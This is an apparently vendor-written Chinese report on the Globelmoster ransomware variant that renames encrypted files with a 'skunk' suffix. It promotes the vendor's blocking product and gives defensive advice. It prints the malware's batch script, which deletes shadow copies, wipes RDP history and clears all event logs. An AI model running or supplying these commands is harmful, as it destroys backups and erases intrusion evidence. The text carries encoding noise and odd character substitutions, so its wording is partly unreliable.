2017 年 7 月 19 日���,國內(nèi)網(wǎng)友在安適論壇上反饋�����,本身的辦事器中了勒索病毒�����,所有的文件均被加密,文件后綴名被修改為“skunk”。經(jīng)瑞星安適專家調(diào)查分析發(fā)現(xiàn)是感染了Ransom.Globelmoster勒索病毒�����。
瑞星安適人員體現(xiàn)����,此病毒早在 7 月 10 日便已收錄進(jìn)瑞星病毒庫�,����,瑞星所有安適產(chǎn)品只要將版本升級到最新便可對其攔截。同時(shí),作為全球首創(chuàng)的可以攔截已知和未知勒索病毒的“瑞星之劍”無需升級便可直接對其進(jìn)行攔截�。
瑞星安適人員介紹���,此次網(wǎng)友反饋的勒索病毒事件可能是用戶的辦事器存在漏洞或是弱口令���,被黑客拿到了辦理員權(quán)限,然后植入該病毒�。因此���,廣大企業(yè)用戶應(yīng)謹(jǐn)慎對待,制止遭受勒索病毒攻擊����。可在辦事器中安置瑞星之劍��,既可以防御病毒攻擊�����,同時(shí)不會對辦事器造成任何影響�����。
“瑞星之劍”是瑞星全球首創(chuàng)針對已知與未知勒索病毒的防御軟件����,既不影響正常工作又不影響系統(tǒng)性能,用戶無需進(jìn)行關(guān)閉系統(tǒng)正常辦事端口�����、打補(bǔ)丁�����、開啟防火墻等操作�����,便可實(shí)現(xiàn)全防御的效果���,可供廣大政府���、企業(yè)和有定制化業(yè)務(wù)系統(tǒng)的用戶直接使用��。
“Globelmoster”勒索病毒變種詳細(xì)分析
1���、病毒運(yùn)行后從資源中解密出加密生成文件的后綴名,和提示文件名
2���、將自身拷貝到%appdata%\Microsoft\SystemCertificates\My\Certificates\目錄中
3���、釋放批處理文件并執(zhí)行
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
4、結(jié)束指定進(jìn)程
5�����、跳過指定路徑不加密
6、全盤加密文件
7�、生成提示頁面
8����、總結(jié)
論壇用戶反饋的病毒樣本就為一存粹加密器�����,沒有感染模塊����。用戶辦事器中毒有可能是辦事器上面存在漏洞或者弱口令���,被黑客種植該樣本勒索����。
9�、防御方法
自查辦事器,看辦事器上面提供的辦事是否存在漏洞���,辦事器系統(tǒng)補(bǔ)丁連結(jié)更新����,按期修改辦理員賬號密碼���,安置瑞星之劍和防病毒軟件按期掃描病毒�。
